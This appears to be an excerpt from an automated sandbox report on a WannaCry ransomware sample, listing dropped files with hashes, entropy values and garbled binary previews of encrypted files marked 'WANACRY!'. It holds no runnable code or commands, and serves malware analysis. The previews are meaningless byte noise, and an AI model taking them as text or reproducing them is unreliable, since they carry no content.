                                                                                      Preview:WANACRY!......Z...ni4..|...H....X:&....Vn...Kh=...8.AQ]>..........SwG.=...+.&p.."O.".......sX;.n.T.....^-..*w.,..Ax.p....A.8.[..4..Cq2.....N...f[..E..d.Z..a.>..3..A.....,Y.......l.:........1.......Lb....v......~.e........7=....}d.>5j...g..Gn...r...#='..z.............x......${.U...R\%..!.Et..=.B..[.A!R...}...G.#...(J..~..>.Q.....B.W-.#..s.0...6.*/..d...$.{Z..r..:..yG~..[...=..}[.;ki..().7......qF....W.4.5...O.#[.q;.#dn....[...A..A.8.....$.....e...bQ..`RZ....2..Z....Xq.B..f.r...Y.~..W..&n.2.Z...[.} ..{...?.v.!.w Uhj....:Oz.%.X.......2-!.;...;..N?.QT....>.R6.......KRz.|7..#[w.K...i.s.01..1@..~.......A-........E...\b.t.R...s5..W../.T..35N.e..W....{...A.....Z..M..).v]6!..h...Yf....=..I..'....Cz\...x..3..........[VH..$...2....4.."j.....N._2/.uJU..T.&..yAM.{.l..gN.V....#..Y!P....#.'Q#...r.X..w.4......]?.G....b.Bha.%.c.c.....~......P.....Y(.[..^.%.'.m..X..x.........qy... ...*..o*...}.. H.rI';O..Q.^'m...)I.g4.z...g.P.c?.ja...F)..)..q.L.xF....?.o..
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1026
                                                                                      Entropy (8bit):7.788288142837305
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:Yqnbpa94346Roe3iepgsUJCY2CTNPPeZztjtUKH5mW:Ymc4/Ro8i8gtTBEtBUooW
                                                                                      MD5:8009B7B1DA4836F2190EFF6385A7B907
                                                                                      SHA1:5885AF82AAB423750EA36315D8A1B17D1DDEB3DE
                                                                                      SHA-256:8B8CBD69F0AA9884966D75550A6AEBEA688E09C776762356654F295C16DC8316
                                                                                      SHA-512:987432C8BEF43DA2051E2412023C89F96377FBBF764C60EE10313A017715C3C1086D50C00E91E7E133F5EC71EF049D1ED8289FB4146AC7E71A5320D5A98E5C3C
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:...0F..v]/..K....#....W.[?.\..k@?..Bj+.!.?........3c.....9...o..O....$.@.......5.D*1.....Wf.!...$...g.9).C..d.Dz.....i.&..U3X..t5.#..l.....r$<.........vO.F$.")..;dR.9\`..].{.........!x.9a..9.x.(...}......\y...4iGQw.?...m...4.myd...O.......A..8N.v..j.u;....L.....%V..\OW.h.zY...._..{".R..P8.....'..l.jD..`.^I...6...i-..$.u@.Lh.@.N..D&...d.....SlA...!e.&.h...Y.O..8`..NY^...r..3.o...J...d.\.VCpqn....6...I02.khf.\.D[..=ia/...>......p.3.T...F/]>...y.9![...C...}F...=.p.....l......WJ.>...?....D...x.Y..^5.....V........f..09zK..T....W._..j.T..L...QC...>!qA.v..@.......A.A.I..u_u.:oW..L...k....E..xA...*p..w..q(..V.`.:...C1c..5V.>....4..b...D.e..pz.=Q......(..J..OuO..g..z.{.R......{...W..?....O...D...'..p.u..\p.RD/..@...Oo..._oYg...=*....z-^......C$...Jz+$.N.....K...l....y.......E.B..tm...X!.J%.L.3<B.I.#dy.........C.75.5.<...k.F.$^.34V..G3..U...D.RK......a.c.$....IZ..x......[.B..c.{.q../1.....+..........7 ..R`..On......,`..........dBP..Vyr[......
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1320
                                                                                      Entropy (8bit):7.830471311622621
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:bkYAUtu1IBlOikPTPXs44eMEaVI2p7XvGF64Q/Qc/4/:bkY5AgM7s8MEaVI2p7GcFQm4/
                                                                                      MD5:8F5A90A28C29CF0BF8F6C7D07EBE4A42
                                                                                      SHA1:00EB3FF279ACC5855A862DDA7C4E0DCC2477DE82
                                                                                      SHA-256:C7A3B68BEC32F09A3F9C8CFC7375B48EA6ABD76B0E4EF002566988527A69D011
                                                                                      SHA-512:88AF1FFFE45570F0A0F2B065711207A696C5D27CBE646C849AEE4F6F0CC641A8C238B0D7166FDE8B20259D8D6C42F0C85EBEC62E44BB53677C74B7402F9B285F
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!.....e.K)<..2.......?....\.......<....O.l...9..l.....F.......u._.n...1'.w...}....n......AN>g..BZ..L.)t...^......3P[..|.i..O...:..j.^.....W.y.2&.s.~...u.$.*%(..._N8.u?1.....?....f.A..l....*.e.p...e2...946lYD<.W.S.H.u...\.-. >44^......./.R{E.....|...............~.R.;*U^.Q.*.uF/}).F.W.n.3....!...~q;.....1.l...AD.$[..)..w.<....O."w..C.,d...I`...%.n..2p.L..6!24.>......95.:z..n.......o..n..N.s.2.-4..F...I.....?....;.N....e.a.S.85.7.X..W......h..rt].{.=e.G..x..H....H......3.4...I.)..R.@.9.....3O.J..bs..6%d.M..'.o......yQ&.-.q-.m.........{..6.%b..g.:.+...pK..r'.^....N.6S.k..?.n..&......p'.C.....2_.tW.s......8.{. <`v...M.!gD.....6...x'..m.*z.#..ph..>..Vn....Bh.H..@......I.O.w...]..C..u1..x.......Ss......LB.6D..X='...{.....A+...kI.o...*F....t....m.........D..O..S..i.t..2.../q..i28.O@dl...K.3....!.7:..:V5..8.v...#.v7.3.6.f..|.....5..jw&..g.......C....R.^.P...ue0...W.....y.E'...W.n6I.b..<@.*.J........;...$.'.riK /..pA..^...;...M.*b.z...Q+.
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1320
                                                                                      Entropy (8bit):7.830471311622621
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:bkYAUtu1IBlOikPTPXs44eMEaVI2p7XvGF64Q/Qc/4/:bkY5AgM7s8MEaVI2p7GcFQm4/
                                                                                      MD5:8F5A90A28C29CF0BF8F6C7D07EBE4A42
                                                                                      SHA1:00EB3FF279ACC5855A862DDA7C4E0DCC2477DE82
                                                                                      SHA-256:C7A3B68BEC32F09A3F9C8CFC7375B48EA6ABD76B0E4EF002566988527A69D011
                                                                                      SHA-512:88AF1FFFE45570F0A0F2B065711207A696C5D27CBE646C849AEE4F6F0CC641A8C238B0D7166FDE8B20259D8D6C42F0C85EBEC62E44BB53677C74B7402F9B285F
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!.....e.K)<..2.......?....\.......<....O.l...9..l.....F.......u._.n...1'.w...}....n......AN>g..BZ..L.)t...^......3P[..|.i..O...:..j.^.....W.y.2&.s.~...u.$.*%(..._N8.u?1.....?....f.A..l....*.e.p...e2...946lYD<.W.S.H.u...\.-. >44^......./.R{E.....|...............~.R.;*U^.Q.*.uF/}).F.W.n.3....!...~q;.....1.l...AD.$[..)..w.<....O."w..C.,d...I`...%.n..2p.L..6!24.>......95.:z..n.......o..n..N.s.2.-4..F...I.....?....;.N....e.a.S.85.7.X..W......h..rt].{.=e.G..x..H....H......3.4...I.)..R.@.9.....3O.J..bs..6%d.M..'.o......yQ&.-.q-.m.........{..6.%b..g.:.+...pK..r'.^....N.6S.k..?.n..&......p'.C.....2_.tW.s......8.{. <`v...M.!gD.....6...x'..m.*z.#..ph..>..Vn....Bh.H..@......I.O.w...]..C..u1..x.......Ss......LB.6D..X='...{.....A+...kI.o...*F....t....m.........D..O..S..i.t..2.../q..i28.O@dl...K.3....!.7:..:V5..8.v...#.v7.3.6.f..|.....5..jw&..g.......C....R.^.P...ue0...W.....y.E'...W.n6I.b..<@.*.J........;...$.'.riK /..pA..^...;...M.*b.z...Q+.
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1026
                                                                                      Entropy (8bit):7.794014215801389
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:om9SNxWbaIyMJ0cGujosEfDpp+6BVPIADToo:dS/cjyw0Juq26BRDEo
                                                                                      MD5:D22E8B78F2020EF2ADC5B29E88C121BD
                                                                                      SHA1:8758DFE3D1C82C4B60E53D64D43C3F9B2ED3B49B
                                                                                      SHA-256:7661222C44BAF8F77F99C5A05316993F9CAFBE63A73B88C833DF7E7A0EB9265E
                                                                                      SHA-512:312111FF736D076195404DD5A4AACF36C2C23809203FE0EF3F51B4B1958B92695366EE8B55B5148B3AA3176905D52A90182EBDE3860B164897CE1221A88D7767
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:O..Br.CEq.bZ.o....dv...HAD/o...t'..2 .......%e...X..h.B.;.A......w..2.....H#.....b(.P......2vr........x. %d.|.]j....K....'...M....L..*...."u.........1.D.B.&e.v#F{...a+[@h...dc..0Pu..O..M\.....W~M..xO...(.AA3...........k>...`...O..t...g........C...i.&G."...N<L?kK.....)..\IEO...'..Y.P7..X.h..I..v.)..e...y.o...}..N4..E..x....'.....W.8.<...H4{4..rM.g.k1.+..hB.#PHw..z.!...Uz.Q9..t......<..xKX>l..\...v.n.....&.....m..Q..EPo......D..E"......J.}..'.q.WA6....4.P....+...Q....}7.{.D.Y%...\......5...<5..t.(6l.I.ul.6.3...q].#...m...?.....I.%..@#.m....;.).a.Ph.j.h.9..Rm.`. .........v[.L<t.53.*Y.\..l.....Z......q.....4}.\..ca..z.....4.j.x.........siKkUO.(.0#..i|@..e...H....n......DO....X.J..JO....S.n.].u[...g&YA^.F.Y..0.U.s...L.@.......De..$EA2.(..:r...........y.~.y.8..p ..E;]A...w..].......[...;p.?;b.9@...7S....2.."...".=.)V0.!.._.........>.M..v)......Ty..V0R.N~.. ..L........1...L...*........1..W5.P.^J.$NF..._..C..O.......h..........k.E.)R...l*..}x..~.a...
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1320
                                                                                      Entropy (8bit):7.84392899957304
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:bk6WSCMXB5RGjZTyIBzCaSKfJ6aaxM5Z8SmQiHFC6xNQECS4f8tla7:bk6WzMjR0RB3R6aaxM5hnXYkIla7
                                                                                      MD5:A275F58AB54DD55A527004DED7399D49
                                                                                      SHA1:B2BE91DBEC1BA99650E6499C72419F6408439C37
                                                                                      SHA-256:1D655DEF9BA8E7A3027CABB4F9E0A68BBE13597237376C2E842E823C8BFB95BD
                                                                                      SHA-512:9501F53D5094855551D2FEB43B4D2A21C27D5D9A02F9B89781DE39A71EA1BC0904E51036DE50B263C156A1629757485E3225799358BE540E3F4010E1C736BF66
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!.....B.F3....G.=R{.w8.(..@...L..........$.] ......m.....j..B....ei-fK....n>...J...}..T..#.Cfs....wd5{...`.."....m.w./r.{1z........Gz...5.ZH...+AF[.y.3.<...8`.KFu...~NI../...xaXm|...Z.;..XK~......#.A......Ur.g.]RX..7yMc`..VT.......GM"..3D.5.P.{.z..............r.m.KT..Y#.(W....c...vJ5.@..Y.......X=,..sF...m...W..m.. ..[...m....t...9..d .W...7_1.ro.<:...1./.aR.....".*:.<~:;..-.g....N./c..VK.....$..y*.cq...M{...A.....g..<#.c.U?:.I.+...3.v.[`..+...@..;.L..z.....q.i..sB....7n..b~..3.)...k.TZ..j...TZ..%...|.......K...E..........~9$....19.Yf%t2.f61.t...?..c....Y^.b...m.v.':..BWvk.....CJ.V.e..v.r.;.Q/:%..~Q...k...[...y<-R.......Xe{...o!...?J....g..+_.6[........k..].0...v.U...Q...xY.l.....S.GY.l..Z/.3......s...m.r'.<....+..S...Z..%K.A_b....|....C.....P...=.!..bzG.E..b......7.-*<,C7h.!r1.\.d..?.M...Oc_.......Io......!.l..D../!.Svdz.|...<"..).]F..U.........P.l....U...A.O...%...........o.gDR.E...PW...g.p....]..%...[.....,......+...
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1320
                                                                                      Entropy (8bit):7.84392899957304
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:bk6WSCMXB5RGjZTyIBzCaSKfJ6aaxM5Z8SmQiHFC6xNQECS4f8tla7:bk6WzMjR0RB3R6aaxM5hnXYkIla7
                                                                                      MD5:A275F58AB54DD55A527004DED7399D49
                                                                                      SHA1:B2BE91DBEC1BA99650E6499C72419F6408439C37
                                                                                      SHA-256:1D655DEF9BA8E7A3027CABB4F9E0A68BBE13597237376C2E842E823C8BFB95BD
                                                                                      SHA-512:9501F53D5094855551D2FEB43B4D2A21C27D5D9A02F9B89781DE39A71EA1BC0904E51036DE50B263C156A1629757485E3225799358BE540E3F4010E1C736BF66
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!.....B.F3....G.=R{.w8.(..@...L..........$.] ......m.....j..B....ei-fK....n>...J...}..T..#.Cfs....wd5{...`.."....m.w./r.{1z........Gz...5.ZH...+AF[.y.3.<...8`.KFu...~NI../...xaXm|...Z.;..XK~......#.A......Ur.g.]RX..7yMc`..VT.......GM"..3D.5.P.{.z..............r.m.KT..Y#.(W....c...vJ5.@..Y.......X=,..sF...m...W..m.. ..[...m....t...9..d .W...7_1.ro.<:...1./.aR.....".*:.<~:;..-.g....N./c..VK.....$..y*.cq...M{...A.....g..<#.c.U?:.I.+...3.v.[`..+...@..;.L..z.....q.i..sB....7n..b~..3.)...k.TZ..j...TZ..%...|.......K...E..........~9$....19.Yf%t2.f61.t...?..c....Y^.b...m.v.':..BWvk.....CJ.V.e..v.r.;.Q/:%..~Q...k...[...y<-R.......Xe{...o!...?J....g..+_.6[........k..].0...v.U...Q...xY.l.....S.GY.l..Z/.3......s...m.r'.<....+..S...Z..%K.A_b....|....C.....P...=.!..bzG.E..b......7.-*<,C7h.!r1.\.d..?.M...Oc_.......Io......!.l..D../!.Svdz.|...<"..).]F..U.........P.l....U...A.O...%...........o.gDR.E...PW...g.p....]..%...[.....,......+...
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1026
                                                                                      Entropy (8bit):7.802399192355314
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:4LTYswbP+t8aUJM99lH5sNoR3Vfa5zRPokIFLwI:40XbPcXqkgo/aPokA
                                                                                      MD5:2ADCC3A49038C3F247CCED7036A72130
                                                                                      SHA1:9080F68269515E1D0CBCB66EAE65C02A3B13A91E
                                                                                      SHA-256:A3823ECA9041EEAF680CDA2287CF1864F17BA170A2212CD0AF0A95B516A29055
                                                                                      SHA-512:2064D4B1C3703C3FAA439C417F663BE5DD84EBA25A9F1127BC1F3CCD4D70D852CD460982BE99127C6A4C800016E5C1597FB607B9AA8204911E958D2D74C3BC79
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:.~......9<2.......i..p..D.H..%8........8]4L.!J.?3#n.m....\oC....+9....|..".y5@.yjF7b-b...{...>s-?.>.-.C.....K.upi...A..}H....~....e5.B.`....x..?.#.6.9...1.B.b............K|.g..+.cY7..S........J.Q.m@o.Y....3!.....Q.\....t..m..|..a....\V../.8.....[.>.%.g\..C.[.....^{m>."..i...y.....>.+.s6..{..[..D.Q-$3.!...9.....4{.....&..-C.r,m..m.]h.*....R:#.ra....S......M..2{....U.y...$.......8..mNw.....ws.=.....D....v....u...v.....D#P..'.J.pw.-Y.M....{nH......#1..|....6.q..[.:....a/.CP..=.jm....../.H........h.yJ..N.m..u.....2..(....l.&.aS.uH..o.......`..c.n...?......*5R..b.TT.Hq.g.K.y 4._*........7.8/:...g.g..:..B.Ul..64..e..N.n. 8...E.y8.c.....-p.+.XTJIo..q.!.r..ce5..P...N......a|...&P.$.4t....K...a.^..8W..-..e.`.F.9..u._..R.(..~..;..;J1Ye.9..........X....X.t.7.....G:.....B~..N.S(..=...n..[.0.M{v.O=..i....8.IX...q.2..\....-}#.~=..1....:..t>m.,u.qu}.@.x8.m..+A.z..l......Tf.E.z.G.p>.g.....<g.....).n....V.G..&n6.^..'...mg:"..).R.hO.KYc..G........._..i.P
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1320
                                                                                      Entropy (8bit):7.865527668216244
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:bkoW8153GdhzCWc36Ww4GdJdCYwJABHrSQ6uO3uiPgDAK2RuiBOeuQQp4Wo8:bkoWM3GTOWownsYBBLSnufiB7u3OWX
                                                                                      MD5:CBF2B25DC0BDF11F0474750B4171E911
                                                                                      SHA1:1959FAFB9CA0D70E26D71583EB4DF70F719F9143
                                                                                      SHA-256:25D4861A064386B1224F97732D998F1B3DBB0DF6ADF8E2244493990508EB8DA2
                                                                                      SHA-512:FDFFBF097681D2590D69FE32D83A8448E1E1B700576FCDF6B160286748F7DCC085823543116C08DD56108B7AD668ABE52B63A6ADDD88F452F917C6E820DA0A0D
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!....A....`.k|.8.a0X.6....FCC8..M.yX}....*.zX..hD..0=..k.]..si....BO.nh..|......7h2,._..... .,.a.....U...d./...<.g...{Y.....e./)....>.D.c.q..a4....1.T03|[Z6N:.....7..'OH.r`.{.....d.FQ...SuTbP..fa........{F...B...lk.>Q..WlWxV.v.C.X..[Mk...v~..................... ..^....c...V..`.....>....KV..4.O.%.b...).$.K;.'>.....4...\.z..b}.=}V.5.)......mS+w......>#.Ht.....\.W.R)..,.Q.j.KJo......e{j(.+...M......g...`.|..&.H....2....VZ...;.....0.^.p$]....uDt=...<bn,.....X.$..2.....S.F..+..v3.7.(:...}...l../............GJP.WM#f!.+.$%...EU.".blm..[.....&......C..U\wo...K.cn..5.f`....d;...:..}..Q...f.8....p.._../"7..d....a.[...H.....-....>.0.z7.......@.[...9.BU..zGB........]0......3..R..i._d..2......\.l..P$.....K.GC.c.\4J.A..<.F....ri5~......8.5I.p.4o..3f@..c ....$qzP.).vNV.....3mg..N.e.;..,..R...(OR.E.........P:..p.H.|..5.....t...!.s.dQ....=.dF......Wn..Mf<O..HK!r...;.!I<....ZD'W.........C....J..T&}...^@.P......s...<\..p<f..m....U.....W..p.:..B.T
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1320
                                                                                      Entropy (8bit):7.865527668216244
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:bkoW8153GdhzCWc36Ww4GdJdCYwJABHrSQ6uO3uiPgDAK2RuiBOeuQQp4Wo8:bkoWM3GTOWownsYBBLSnufiB7u3OWX
                                                                                      MD5:CBF2B25DC0BDF11F0474750B4171E911
                                                                                      SHA1:1959FAFB9CA0D70E26D71583EB4DF70F719F9143
                                                                                      SHA-256:25D4861A064386B1224F97732D998F1B3DBB0DF6ADF8E2244493990508EB8DA2
                                                                                      SHA-512:FDFFBF097681D2590D69FE32D83A8448E1E1B700576FCDF6B160286748F7DCC085823543116C08DD56108B7AD668ABE52B63A6ADDD88F452F917C6E820DA0A0D
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!....A....`.k|.8.a0X.6....FCC8..M.yX}....*.zX..hD..0=..k.]..si....BO.nh..|......7h2,._..... .,.a.....U...d./...<.g...{Y.....e./)....>.D.c.q..a4....1.T03|[Z6N:.....7..'OH.r`.{.....d.FQ...SuTbP..fa........{F...B...lk.>Q..WlWxV.v.C.X..[Mk...v~..................... ..^....c...V..`.....>....KV..4.O.%.b...).$.K;.'>.....4...\.z..b}.=}V.5.)......mS+w......>#.Ht.....\.W.R)..,.Q.j.KJo......e{j(.+...M......g...`.|..&.H....2....VZ...;.....0.^.p$]....uDt=...<bn,.....X.$..2.....S.F..+..v3.7.(:...}...l../............GJP.WM#f!.+.$%...EU.".blm..[.....&......C..U\wo...K.cn..5.f`....d;...:..}..Q...f.8....p.._../"7..d....a.[...H.....-....>.0.z7.......@.[...9.BU..zGB........]0......3..R..i._d..2......\.l..P$.....K.GC.c.\4J.A..<.F....ri5~......8.5I.p.4o..3f@..c ....$qzP.).vNV.....3mg..N.e.;..,..R...(OR.E.........P:..p.H.|..5.....t...!.s.dQ....=.dF......Wn..Mf<O..HK!r...;.!I<....ZD'W.........C....J..T&}...^@.P......s...<\..p<f..m....U.....W..p.:..B.T
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1026
                                                                                      Entropy (8bit):7.834230382940874
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:5C//OXYQTWtqAkNJq/picTiApWlNW5z7dlx2lQ2A4:5CdkWt7IA/0cuLenE1x
                                                                                      MD5:BAA177A8A1588AAD72DB0337B1A66916
                                                                                      SHA1:C89017381930476154487EDABD772E68C3D6676D
                                                                                      SHA-256:683E5E59DD9C4C0F77342DE6C6F66DD52B755C0EFB0D9D5905DF02FCBDD68108
                                                                                      SHA-512:E00E751500A3C0244DEB1DA9F3E64A6A14F4525A153D07906905FF4EEA53E25B7FEDB45C774F977710EDB1CD3E547099AD15FF752455427E97BDAF82E6785F88
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:A1V..................`...0v....l.._H..t.9...^.....?7...x...2&o?......@i|...d......Z"...QK...g5....V..B....eE..W.$....A...F..+...%5.P.P.&.......h...2...X.Gti-g..V....}tl.......z..q.E.D..U............l|.Th.I......c.d.k....;...3,.SS.y..../ dn...3D.]..IB.$...r...~.?A.......y..k.."1....U....j..6.J..:68o.#.....>.......X..a....Og.:&.Q.f?.bP...<...sV$.......F<CA...D.....+.....=Yg.w...~..X.^....u.S%4..C...a......36.(`VgR0.7....T!..c...4......Rz..).@./..|.-S....d...q.X{S...P..A%bB......J...z..E.......o;.~P....N!........Hh..\.m.c..SI..1.^=c.5..bi./.'6[.U....M..Q..G..A._.D !.o ...30.@U.H.z...iBa.y61?.g....!..f.7zr.d............LG..1..k.0ix....i..0YY....6.T."V.i.R..h,..c..,.M.39.F....C..h.+.\K....u7.5O.B..a.?v.J...n0'4(r.#....!..........xd...").6.....z......`.p........._..]n~.m.b^.o(p..R7.l[.........=9%..L...>1.P).b......j0F..?.c..o.uY..T]...%l....V.U.2-M.......\...$0.z...J.9.B......&..\.....*..~...Q#.os}RM..]..V...4Yky......:.6.?P.t.&....D...}...X7%.
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1320
                                                                                      Entropy (8bit):7.8416280994035015
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:bkh2Y6GG4ltWa5qBAKugy2AowjbFIn64uP98jES4lvGCVCUU6GD:bk/ea5qBAKjy2AosFv1l8j69VCUUR
                                                                                      MD5:242CB6141DCDA30AD9F0F09CFE6C1B52
                                                                                      SHA1:957D7CB05D4023EE2E6FE774AF7C45C3DA24640B
                                                                                      SHA-256:0137852F9C7C7A2B78CBB78E63B79E2E404F2984144611E6DA0371621A30CCFD
                                                                                      SHA-512:221F28745274472834A157719E26C05D827B289C944129B01826DF8600D157C9E6BEF81FED385CE52913E446D43B52B7C36B18957588FD1393742E79163184A6
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!....B....&........F..z._[P6.'..\..e....o......[W...A...<..:._?.......%R3]Ph-.d...k.U...K..QS.v.g.\...^...V0....1...2.7..fLt.........kNt..V.4[..X.......um...q........Q.p.S...R...=W.b.~.GMJ...lW-.-S......}.e....`..n....j.p+...Bj-*l..Q...r..9.M\.P...!............6....k..Y=. E)...Z....d...4..z....lE...c5. A..0.......t...`....9U.H...p.f.u...>tY...B..xV.>...9.dsK.xE....YPX.......s~..DC2._.bW.gR.=.(.......oE..g.W..B..; .|...>.*M..t.30..w.&....}e......h.(G. .^IH....m8.f.V......hJ..,=z.x..WL.|f..5y'b..,..Z..Z...../.a.Z...%<...b.^^<.a.^...$.........]s.s.G........^.+4W.....=.">X......]......P.E.9....O..........._388q..1..,.....)....v.UB..E..jApF.R...Q.u.d..>..P.....1..kJ+dA...}....d.h.\. j$QDU.2..{%..V...z.....6......U.#>e.(...oky...TYtY.s.L.?...,...#a".....q.1.C.0.c....!....:U7._Dy.9..U.5..X...#.(.}.b.Q..+.m..U}.*<F....B_}..j>.....%l.r...8y.g&.....X..e..wK........[\....w..PpR..A......k...{I..bx..S.._.gd....X^5h.d......B.gX.<...g.jo...N
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1320
                                                                                      Entropy (8bit):7.8416280994035015
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:bkh2Y6GG4ltWa5qBAKugy2AowjbFIn64uP98jES4lvGCVCUU6GD:bk/ea5qBAKjy2AosFv1l8j69VCUUR
                                                                                      MD5:242CB6141DCDA30AD9F0F09CFE6C1B52
                                                                                      SHA1:957D7CB05D4023EE2E6FE774AF7C45C3DA24640B
                                                                                      SHA-256:0137852F9C7C7A2B78CBB78E63B79E2E404F2984144611E6DA0371621A30CCFD
                                                                                      SHA-512:221F28745274472834A157719E26C05D827B289C944129B01826DF8600D157C9E6BEF81FED385CE52913E446D43B52B7C36B18957588FD1393742E79163184A6
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!....B....&........F..z._[P6.'..\..e....o......[W...A...<..:._?.......%R3]Ph-.d...k.U...K..QS.v.g.\...^...V0....1...2.7..fLt.........kNt..V.4[..X.......um...q........Q.p.S...R...=W.b.~.GMJ...lW-.-S......}.e....`..n....j.p+...Bj-*l..Q...r..9.M\.P...!............6....k..Y=. E)...Z....d...4..z....lE...c5. A..0.......t...`....9U.H...p.f.u...>tY...B..xV.>...9.dsK.xE....YPX.......s~..DC2._.bW.gR.=.(.......oE..g.W..B..; .|...>.*M..t.30..w.&....}e......h.(G. .^IH....m8.f.V......hJ..,=z.x..WL.|f..5y'b..,..Z..Z...../.a.Z...%<...b.^^<.a.^...$.........]s.s.G........^.+4W.....=.">X......]......P.E.9....O..........._388q..1..,.....)....v.UB..E..jApF.R...Q.u.d..>..P.....1..kJ+dA...}....d.h.\. j$QDU.2..{%..V...z.....6......U.#>e.(...oky...TYtY.s.L.?...,...#a".....q.1.C.0.c....!....:U7._Dy.9..U.5..X...#.(.}.b.Q..+.m..U}.*<F....B_}..j>.....%l.r...8y.g&.....X..e..wK........[\....w..PpR..A......k...{I..bx..S.._.gd....X^5h.d......B.gX.<...g.jo...N
                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                      Category:dropped
                                                                                      Size (bytes):3481589
                                                                                      Entropy (8bit):7.999940457163727
                                                                                      Encrypted:true
                                                                                      SSDEEP:98304:vhvb2BVmAw0p9jIVcEj5nnZNRyA30yBSRT:vhvq7Bu6EZnZN5EyBSN
                                                                                      MD5:EFE76BF09DABA2C594D2BC173D9B5CF0
                                                                                      SHA1:BA5DE52939CB809EAE10FDBB7FAC47095A9599A7
                                                                                      SHA-256:707A9F323556179571BC832E34FA592066B1D5F2CAC4A7426FE163597E3E618A
                                                                                      SHA-512:4A1DF71925CF2EB49C38F07C6A95BEA17752B025F0114C6FD81BC0841C1D1F2965B5DDA1469E454B9E8207C2E0DFD3DF0959E57166620CCFF86EEEB5CF855029
                                                                                      Malicious:false
                                                                                      Reputation:low
